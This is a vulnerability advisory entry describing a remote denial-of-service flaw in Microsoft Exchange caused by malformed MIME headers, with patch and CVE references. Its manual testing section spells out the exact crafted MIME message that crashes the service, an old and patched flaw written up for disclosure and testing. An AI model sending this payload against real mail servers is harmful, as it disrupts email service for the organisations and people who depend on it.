Microsoft Exchange Malformed MIME Header DoS

2000-10-31T00:00:00
ID OSVDB:457
Type osvdb
Reporter Art Savelev(asavelev@eni-net.com)
Modified 2000-10-31T00:00:00

Description

Vulnerability Description

Exchange contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted email is sent, which contains specific malformed MIME headers, and will result in loss of availability for the service.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

Short Description

Exchange contains a flaw that may allow a remote denial of service. The issue is triggered when a specially crafted email is sent, which contains specific malformed MIME headers, and will result in loss of availability for the service.

Manual Testing Notes

Send the following in the body of an email message:

MIME-Version: 1.0

Content-Type: multipart/alternative;

 boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk

Content-Type: text/plain;

    charset = ""

Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

References:

Nessus Plugin ID:10558 Microsoft Security Bulletin: MS00-082 Mail List Post: http://marc.theaimsgroup.com/?l=bugtraq&m=97405331309171&w=2 CVE-2000-1006 Bugtraq ID: 1869